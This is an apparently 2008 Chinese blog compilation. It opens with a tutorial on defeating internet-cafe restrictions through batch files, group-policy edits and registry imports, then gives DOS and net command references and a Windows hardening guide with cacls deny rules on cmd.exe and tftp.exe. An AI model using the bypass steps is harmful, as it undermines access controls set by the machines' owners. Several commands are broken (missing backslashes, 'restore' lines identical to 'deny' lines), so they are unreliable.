用dos命令破解网吧限制的方法和dos命令全集 2008-06-27 09:03
一:网吧限制本地硬盘的访问。
一般情况下这有两种可能,一种就是简单的隐藏掉,另外一种是不但隐藏而且还禁止访问。而根据操作系统的不同,我发现一般98的系统都只是简单的隐藏,而XP或者2K的系统会做禁止访问限制。
对简单的隐藏,要破解很简单。利用批处理文件来:
新建(或者打开)一个记事本文件,输入:
start c:\
然后另存为bat为后缀的,文件名可以随便取,但是后缀名一定要为bat。比如123.bat,这样就是一个简单的批处理文件了。
双击这个bat批处理文件,运行的效果就是打开C盘。这里简单解释一下这个批处理命令start的意义,其实从字面就可以看出,这个命令就相当于“运行”比如你要运行命令提示符,也可以输入:start command
而这个start其实就是个dos命令,批处理文件其实可以简单地理解成可以自动运行dos命令的文件,当然批处理的功能并不是只这么简单,大家理解就可以了!
如果是XP或者2K的系统,你运行上面的批处理文件提示“本次操作由于这台计算机的限制而被取消。请与您的系统管理员联系。”那就是被禁止访问了,可以从组策略那里进行更改设置。
同样,因为网吧一般不会开运行给你,系统盘又限制了,我们只能再次利用批处理文件来运行打开组策略。
这次输入:
start gpedit.msc
然后同样另存为bat文件,gpedit.msc就是组策略。打开组策略,“用户配置——管理模板——windows组件——windows资源管理器”这个目录下有个选项“防止从我的电脑访问驱动器”呵呵,看到了吧,设置成已禁用,就OK了。然后再用start c:\就可以打开C盘了。这里大家肯定会发现组策略里面有好多相关的限制,比如隐藏驱动器也在那里,都可以设置,呵呵,这个大家自己发掘这里暂时不说太多了。
二:文件被隐藏,进了本地硬盘竟然发现一个文件都没有。
解决的办法,不同程度的限制就分下面几种不同的程度解决:
1:最简单的,就是直接在“文件夹选项——查看——”这里有个显示所有文件的选项,点选就可以显示所有的文件了。
2:98的文件夹选项是在查看菜单下,2K和XP的是在工具菜单下。一般98的文件夹选项会在,而XP的在组策略里可以设置隐藏。对于XP,打开组策略“用户配置——管理模板——windows组件——windows资源管理器”这个目录下有个选项“从工具菜单删除文件夹选项”设置成已禁用,就搞定了。
当然98的系统,也可以把那个文件夹选项弄没,那我们要使它显示出来,可以打开注册表,按常理在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\这里就是文件夹选项的注册表键值了。但如果98要是把这全删了(我是有遇见过这么BT的网管……)我们想改也没法改,就只能导入注册表文件来搞定
因为注册表内容比较多,这里就不复制过来了,大家直接去下载本帖所带的附件“文件夹显示.reg”直接导入就可以了。现在就可以直接设置了。
3:打开文件夹选项后发现没有“显示所有文件”这个怎么办?不用着急,同样的道理也是在注册表限制的,如果你是按照第2步那样导入了整个注册表文件,那就不会出现这种情况。
如果是XP的用组策略使文件夹选项显示出来的,那只要新建个记事本,输入下面红色的字,然后另存为123.reg。
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="显示所有文件"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000000
"HKeyRoot"=dword:80000001
"HelpID"="update.hlp#51105"
然后双击该文件导入注册表就可以。
4:上面三种情况都是针对文件夹选项来破限制的,相信应该可以解决大部分的问题了。但是还有其他的办法,就是使用attrib这个DOS命令解除文件的隐藏属性,甚至系统属性都可以解除。不过这个有个缺点就是你得事先知道系统有哪些文件(其实这并不是什么难关,系统就那么点文件夹都差不多呵呵)。
具体的操作步骤是这样的:
先打开命令提示符,我们要习惯把命令提示符当运行菜单来使用。怎么打开命令提示符?晕,同样的道理98的系统用“start command”XP的系统用“start cmd”保存成批处理文件运行……这个道理以后就不再说了,举一反三是最基本的学习能力。
然后在命令提示符里输入:
attrib 目标文件或文件夹 -h
这个就去掉了该文件或文件夹的隐藏属性。参数“-”表示去掉,“h”就是隐藏的属性参数。同样如果要隐藏某文件可以用“+h”。
attrib这个命令还可以这样用:
attrib *.* -h
显示所有的文件,但是记住,这样并不能显示所有的文件夹……应该是没有批量显示所有文件夹的功能……这个大家多看看网络上基础的知识就懂了。不说太多了。
三:注册表被限制。这也有两种情况。
1。当我们打开regedit时候提示禁止使用注册表,这个表示虽然打不开注册表编辑器但是我们还可以用reg文件导入的办法进行修改编辑注册表。同样也可以用导入的办法解除禁止。具体的方法很简单,网络上随便都可以查到,就是写个reg文件,内容下面红色字体:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
这样就可以打开注册表编辑器了。
2。当想导入注册表文件时候提示“注册表被管理员停用,请与系统管理员联系”时候,就应该是XP而非98的操作系统了。解除办法同样是组策略里
打开组策略“用户配置——管理模板——系统”这个目录下有个“阻止访问注册表编辑工具”设置成已禁用就搞定了。
四:下载限制。
这个我曾经遇见过搞不定的情况,所以本来很不想说。因为一个网吧如果开出来连下载都限制的话,那网管估计是个垃圾白痴了。要换做我绝对不去这样的网吧上。闲话就不多说了,这里简单介绍几种可能破解下载限制的办法
1:最简单的使用在线安装工具,在线下载之类的。或者QQ网络硬盘下载TT安装,用TT自带的下载工具就可以下载。
但是有点麻烦的是QQ网络硬盘被屏蔽了的话就不好办了,如果对方是修改了QQ的dll文件来达到这种目的的话,那还要你们自己去找找想关的修改资料,我没弄过。如果只是QQ的系统设置那里进行隐藏的话那我们可以自己破,打开QQ菜单“个人设置——系统设置——面板设置——系统面板”这里可以设置相关的面板隐藏或者显示,不过我估计现在网吧都是修改dll文件来彻底的删掉网络硬盘的,所以这招估计不见效!
2:如果在线安装时候因为internet选项的设置,导致在线安装控件不能运行的话,那就要进internet选项进行设置了。不过网吧一般限制设置internet选项,要破这个限制可以进系统安装目录一般的都是c:\windows\system(XP的是system32)inetcpl.cpl的文件,这个文件就是internet选项的设置文件。
如果是万象的网吧,那这个文件名会被改成inetcpl.cpp,只要把后缀名改成cpl就可以打开了!(到这里了别再跟我说进系统盘还进不了……-_-bb!)
打开internet选项,这里其实本身可以做一个下载的限制,就是“安全——internet——自定义级别——下载”这里可以设置禁止下载和允许下载,如果只是这样限制的话那就已经可以破下载了。不过一般现在没这么简单了。现在把在线运行控件的限制解除了吧,同样在“安全——internet——自定义级别——ActiveX控件和插件“这里设置一下启用就可以了。
而如果这样还是不行,还是不能解除下载限制的话,可以考虑是否被修改注册表了。自己去网络上搜索注册表的键,我这里不能全写出来,因为我曾经看过一篇文章,关于下载的键不少,复制过来也是浪费篇幅,大家也得学会自己搜索。有时候网吧的限制,手动无法破解也是事实,毕竟人家是用软件做的这么多限制的……呵呵!
五:其他一些遇见过的小问题
有的时候你运行gpedit.msc时候会提示找不到文件名找不到该组件,这就是管理员修改了gpedit.msc的文件名了。可以先运行mmc,打开mmc管理器,然后添加系统组件,那里找到组策略然后添加,就可以了!还有,如果管理员将gpedit.dll也改名甚至删除,那用MMC也添加不到了~~!!有啥办法吗?那就是自己打包gpedit.msc和gpedit.dll放到网络硬盘去……
暂时就想到这些,如果还有什么补充的或者谬误的地方欢迎各位添加和纠正`````~~
网络最经典命令行
1.最基本,最常用的,测试物理网络的
ping 192.168.0.8 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使
Net send 计算机名/IP * (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名 (追捕的工作原理)
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP!:
ARP -s 192.168.10.59 00 -50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如: C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享(可以编个bat文件,开机自运行,把共享都删了!)
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
At
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
语法
at [\ComputerName] [{[ID] [/delete] /delete [/yes]}]
at [[\ComputerName] hours:minutes [/interactive] [{/every:date[,...] /next:date[,...]}] command]
参数
\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
ID
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
/yes
删除已计划的事件时,对来自系统的所有询问都回答“是”。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
date
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
/next:
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
/?
在命令提示符显示帮助。
注释
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅“相关主题”。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员。
特殊用途的IP地址介绍
224.0.0.1
组播地址,注意它和广播的区别。从224.0.0.0到239.255.255.255都是这样的地址。224.0.0.1特指所有主机,224.0.0.2特指所有路由器。这样的地址多用于一些特定的程序以及多媒体程序。如果你的主机开启了IRDP(Internet路由发现协议,使用组播功能)功能,那么你的主机路由表中应该有这样一条路由。
169.254.x.x
如果你的主机使用了DHCP功能自动获得一个IP地址,那么当你的DHCP服务器发生故障,或响应时间太长而超出了一个系统规定的时间,Wingdows系统会为你分配这样一个地址。如果你发现你的主机IP地址是一个诸如此类的地址,很不幸,十有八九是你的网络不能正常运行了。
10.x.x.x、172.16。x。x~172.31。x。x、192.168。x。x
私有地址,这些地址被大量用于企业内部网络中。一些宽带路由器,也往往使用192.168.1.1作为缺省地址。私有网络由于不与外部互连,因而可能使用随意的IP地址。保留这样的地址供其使用是为了避免以后接入公网时引起地址混乱。使用私有地址的私有网络在接入Internet时,要使用地址翻译(NAT),将私有地址翻译成公用合法地址。在Internet上,这类地址是不能出现的。
打造个人电脑安全终极防线
【一、禁止默认共享 】
1.先察看本地共享资源
运行-cmd-输入net share
2.删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit
在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA
项里数值名称RestrictAnonymous的数值数据由0改为1.
4.关闭自己的139端口,ipc和RPC漏洞存在于此.
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”
属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关
闭了139端口,禁止RPC漏洞.
----------------------------------------
【二、设置服务项,做好内部防御】
-------------------
A计划.服务策略:
控制面板→管理工具→服务
关闭以下服务:
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接跟踪客户端服务]
5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
10.Messenger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Help Session Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持
而使用户能够共享文件、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Windows Image Acquisition (WIA)[照相服务,应用与数码摄象机]
-------------------
B计划.帐号策略:
一.打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是10
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的加密来存储密码 禁用
-------------------
C计划.本地策略:
打开管理工具
找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
然后再到管理工具找到
事件查看器
应用程序 右键 属性 设置日志大小上限 我设置了512000KB 选择不覆盖事件
安全性 右键 属性 设置日志大小上限 我也是设置了512000KB 选择不覆盖事件
系统 右键 属性 设置日志大小上限 我都是设置了512000KB 选择不覆盖事件
-------------------
D计划.安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,启用比较好,但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.重命名来宾帐户guest [最好写一个自己能记住中文名]让黑客去猜解guest吧,而且还得删除这个帐户,后面有详细解释]
9.帐户.重命名系统管理员帐户[建议取中文名]
-------------------
E计划.用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过终端允许登陆 删除Remote Desktop Users
---------------------
F计划.终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
---------------------
G计划.用户和组策略
打开管理工具
计算机管理.本地用户和组.用户
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不组了.分经验的(不管他.默认设置)
---------------------
X计划.DIY策略[根据个人需要]
1.当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3.对匿名连接的额外限制
4.禁止按 alt+crtl+del
5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6.只有本地登陆用户才能访问cd-rom
7.只有本地登陆用户才能访问软驱
8.取消关机原因的提示
1、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
2、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
3、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9.禁止关机事件跟踪
开始“Start ->”运行“ Run ->输入”gpedit.msc “,在出现的窗口的左边部分,
选择 ”计算机配置“(Computer Configuration )-> ”管理模板“
(Administrative Templates)-> ”系统“(System),在右边窗口双击
“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),
点击然后“确定”(OK)保存后退出这样,你将看到类似于windows 2000的关机窗口
----------------------------------------
【三、修改权限防止病毒或木马等破坏系统】
winxp、windows2003以上版本适合本方法.
因为目前的木马抑或是病毒都喜欢驻留在system32目录下,如果我们用命令限制system32的写入和修改权限的话
那么,它们就没有办法写在里面了.看命令
---------------------
A命令
cacls C:windowssystem32 /G administrator:R 禁止修改、写入C:windowssystem32目录
cacls C:windowssystem32 /G administrator:F 恢复修改、写入C:windowssystem32目录
呵呵,这样病毒等就进不去了,如果你觉得这个还不够安全,
还可以进行修改觉得其他危险目录,比如直接修改C盘的权限,但修改c修改、写入后,安装软件时需先把权限恢复过来才行
---------------------
B命令
cacls C: /G administrator:R 禁止修改、写入C盘
cacls C: /G administrator:F 恢复修改、写入C盘
这个方法防止病毒,
如果您觉得一些病毒防火墙消耗内存太大的话
此方法稍可解决一点希望大家喜欢这个方法^_^
---------------------
X命令
以下命令推荐给高级管理员使用[因为win版本不同,请自行修改参数]
cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec 禁止网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用cmd
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 禁止网络用户、本地用户在命令行和gui下使用tftp32.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp32.exe
----------------------------------------
【四、重要文件名加密[NTFS格式]】
此命令的用途可加密windows的密码档,QQ密码档等等^.^
命令行方式
加密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名(或文件夹名)”。
解密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名(或文件夹名)”。
----------------------------------------
【五、修改注册表防御D.D.O.S】
在注册表HKLMSYSTEMCurrentControlSetServicesTcpipParameters中更改以下值可以帮助你防御一定强度的DoS攻击
SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0
NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0
KeepAliveTime REG_DWORD 300,000
PerformRouterDiscovery REG_DWORD 0
EnableICMPRedirects REG_DWORD 0
更多新的防御技巧请搜索其他信息,
由于本人不敢拿自己的硬盘开玩笑,所以没做实验... ...
----------------------------------------
【六、打造更安全的防火墙】
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 本人现将自己所知道的端口公布如下(如果觉得还有危险需要过滤的,请联系本人:OICQ 250875628
端口 协议 应用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
那么,我们根据自己的经验,将下面的端口关闭
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了
----------------------------------------
【七、保护个人隐私】
1、TT浏览器
选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的.
TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染,你删除掉又重新安装一个就是.[TT就是腾讯的浏览器](不过有些人喜欢用MyIE,因为我使用的时间和对他的了解不是很深吧,感觉不出他对安全方面有什么优势一_一~,希望支持MyIE的朋友不要揍我,否则我会哭... ...)
2、移动“我的文档”
进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移动”按钮,
选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪,桌面、开始等处都看不到了,
建议经常使用的朋友做个快捷方式放到桌面上。
3、移动IE临时文件
进入“开始→控制面板→Internet 选项”,在“常规”选项卡的“Internet 文件”栏里点“设置”按钮,
在弹出窗体中点“移动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”,
系统会自动重新登录。点本地连接,高级,安全日志,把日志的目录更改专门分配日志的目录,
不建议是C:再重新分配日志存储值的大小,我是设置了10000KB
----------------------------------------
【八、第三方软件的帮助】
防火墙:天网防火墙(建议)[二道贩子注:winxp以上可以考虑用系统自带的防火墙,win2000可以考虑用IPSEC,是个锻炼的机会)
杀毒软件:卡巴斯基
二道贩子后注:
现在黑客的攻击有从传统的系统漏洞转向了你的浏览器,所以要在升级一些传统漏洞补丁的同时要注意你的浏览器.
----------------------------------------
XP总命令集合
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略
net命令参数详细说明
net命令参数详细说明
(1)NET VIEW
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式:net view [\\\\computername │ /domain[:domainname]
参数介绍:
<1>键入不带参数的net view显示\"当前域\"的计算机列表。
<2>\\\\computername 指定要查看其共享资源的计算机。
<3>/domain[omainname]指定要查看其可用计算机的域
简单事例
<1>net view /domain 显示 所有域列表
<2>net view /domain:LOVE 显示任意一域中 所有计算机列表。
(net view 显示当前域的 所有计算机列表。)
<3>net view
MS-DOS未公开的命令与参数
MS-DOS到6.22版为止,依然保留着很多未公开的命令和参数。下面对这些命令和参数作一介绍。
1.TRUENAME
在使用SUBST、JOIN命令或在网络上将物理盘映射为逻辑盘的情况下,用于显示文件与目录的实际物理位置。
2.FDISK/MBR
